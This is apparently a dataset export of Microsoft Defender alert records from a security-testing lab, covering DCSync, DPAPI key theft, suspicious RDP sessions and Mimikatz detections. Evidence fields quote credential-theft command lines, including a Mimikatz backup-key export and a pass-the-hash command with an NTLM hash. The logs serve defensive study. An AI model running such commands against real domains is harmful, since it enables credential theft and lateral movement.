alertId
stringclasses 278
values | providerAlertId
stringclasses 278
values | incidentId
int64 486
989
⌀ | serviceSource
stringclasses 2
values | creationTime
stringdate 2022-09-30 05:04:51
2023-01-24 06:03:50
⌀ | lastUpdatedTime
stringdate 2022-11-12 01:35:42
2023-01-24 06:05:47
⌀ | resolvedTime
stringclasses 23
values | firstActivity
stringdate 2022-09-07 09:25:00
2023-01-24 05:31:07
⌀ | lastActivity
stringdate 2022-09-30 05:00:00
2023-01-24 05:43:53
⌀ | title
stringclasses 62
values | description
stringclasses 51
values | category
stringclasses 12
values | status
stringclasses 2
values | severity
stringclasses 4
values | investigationId
int64 20
64
⌀ | investigationState
stringclasses 9
values | classification
stringclasses 1
value | determination
stringclasses 1
value | detectionSource
stringclasses 7
values | detectorId
stringclasses 48
values | assignedTo
stringclasses 3
values | actorName
stringclasses 1
value | threatFamilyName
stringclasses 6
values | mitreTechniques
listlengths 0
8
⌀ | devices
listlengths 1
6
⌀ | entities
listlengths 0
49
⌀ | entityType
stringclasses 2
values | evidenceCreationTime
stringclasses 469
values | verdict
stringclasses 5
values | remediationStatus
stringclasses 2
values | accountName
stringclasses 30
values | domainName
stringclasses 17
values | userSid
stringclasses 22
values | aadUserId
stringclasses 8
values | userPrincipalName
stringclasses 14
values | sha1
stringclasses 28
values | sha256
stringclasses 27
values | fileName
stringclasses 21
values | filePath
stringclasses 13
values | processId
int64 0
20.7k
⌀ | processCommandLine
stringclasses 67
values | processCreationTime
stringclasses 133
values | parentProcessId
int64 0
14.6k
⌀ | parentProcessCreationTime
stringclasses 63
values | parentProcessFileName
stringclasses 14
values | parentProcessFilePath
stringclasses 11
values | detectionStatus
stringclasses 1
value | deviceId
stringclasses 9
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:52.4166667Z
|
Suspicious
|
None
|
root
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451255713972_-1626990615
|
7f0c54af-3342-4223-8286-0559824db4a5
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:12:05.5714183Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:09:53.2585344Z
|
2022-11-18T05:14:15.5156098Z
|
Suspicious service launched
|
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
|
Execution
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
a5af9713-6eea-4d23-9bdc-9cab19f19092
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1569.002"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Medium",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
aa67c58544-b4ab-49f8-9fc5-5f9b51cb5d83
|
67c58544-b4ab-49f8-9fc5-5f9b51cb5d83
| 765
|
MicrosoftDefenderForIdentity
|
2022-11-21T03:32:46.1068306Z
|
2022-11-21T03:34:47.7466667Z
| null |
2022-11-21T02:06:50.639939Z
|
2022-11-21T02:33:50.105336Z
|
Suspected DCSync attack (replication of directory services)
|
2 accounts on MSDXV2-Win10V sent 7 replication requests to MSDXV2-DC.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
AzureATP
|
DirectoryServicesReplicationSecurityAlert
| null | null | null |
[
"T1003",
"T1003.006"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Medium",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T03:32:46.1833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T03:32:46.1833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T17:09:16.3333333Z
|
Unknown
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T15:57:26.76Z
|
Suspicious
|
None
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T21:50:32.66Z
|
Suspicious
|
None
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
aa689fcc0c-b232-4a27-8c86-651cd4dd4863
|
689fcc0c-b232-4a27-8c86-651cd4dd4863
| 686
|
MicrosoftDefenderForIdentity
|
2022-11-11T08:24:15.5273741Z
|
2022-11-12T01:40:19.3466667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:32.543611Z
|
2022-11-11T08:17:32.631215Z
|
Malicious request of Data Protection API (DPAPI) master key
|
Steve Lewis (IT director) on MSDXV2-Win10V successfully obtained the DPAPI domain backup key from MSDXV2-DC.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
AzureATP
|
RetrieveDataProtectionBackupKeySecurityAlert
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1555",
"T1555.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:24:15.57Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:24:37.89Z
|
Suspicious
|
None
| null | null | null | null | null | null | null | null | null | 0
|
0001-01-01T00:00:00Z
| 0
|
0001-01-01T00:00:00Z
| null | null | null | null |
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-21T02:05:47.19Z
|
Suspicious
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 11,616
|
type secret.txt
|
2022-11-21T02:01:44.3957302Z
| 7,452
|
2022-11-21T02:01:44.2419747Z
| null | null |
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:19:39.2166667Z
|
Benign
|
None
|
ronhd
|
MSDXV2
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153087713483_-1259269531
|
225be4a3-4843-447d-8d5d-701ab5c04a1f
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:15:08.7713685Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:11:27.4225532Z
|
2022-09-30T06:11:51.5727687Z
|
Suspicious RDP session
|
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
|
SuspiciousActivity
|
Resolved
|
High
| 20
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:08.81Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.81Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.81Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.81Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957493221662_648641683
|
a575be64-afce-415c-bfc3-dfbb3d043215
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:49:09.3221869Z
|
2022-12-22T08:49:09.84Z
| null |
2022-12-22T08:47:53.413688Z
|
2022-12-22T08:47:53.413688Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
| null | null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:49:09.35Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:49:09.35Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv8-dc.msdxv8.m365dpoc.com /export\" exit",
"processCreationTime": "2022-12-22T08:47:53.3153269Z",
"processId": 10852,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-12T09:28:24.68Z
|
Unknown
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037515968051731_-1966537717
|
6aa0bf88-81a9-4352-afab-6f829898ad85
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:19:56.8051952Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:58.3607509Z
|
2022-11-11T08:17:58.3607509Z
|
Suspicious account creation
|
A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization.
|
Persistence
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1136",
"T1136.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] |
[
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:19:56.9466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:23:45.7966667Z
|
Suspicious
|
None
|
hacker
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:15:31.2733333Z
|
Suspicious
|
Active
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 6,500
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
|
2022-11-18T05:09:31.2191789Z
| 4,976
|
2022-11-18T05:04:12.7150402Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:15:56.7833333Z
|
Suspicious
|
None
|
ronhd
|
evilcorp.cn
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:45.81Z
|
Suspicious
|
None
|
admin
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958499217192_1057711108
|
8dac1971-8d69-4d83-ae69-bd46ccf1e356
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:50:49.9217467Z
|
2022-12-22T08:59:26.02Z
| null |
2022-12-22T08:26:21.6761079Z
|
2022-12-22T08:48:44.951734Z
|
'Mimikatz' malware was detected during lateral movement
|
'DefenderObservation.ThreatFamily' malware was detected on this device. An attacker might be attempting to move laterally to this device from another device on the network.
|
LateralMovement
|
New
|
Medium
| 61
|
PendingApproval
| null | null |
WindowsDefenderAtp
|
7a6f0432-57d7-4a96-a286-0bd733ea425d
| null | null | null |
[
"T1021.001",
"T1078"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
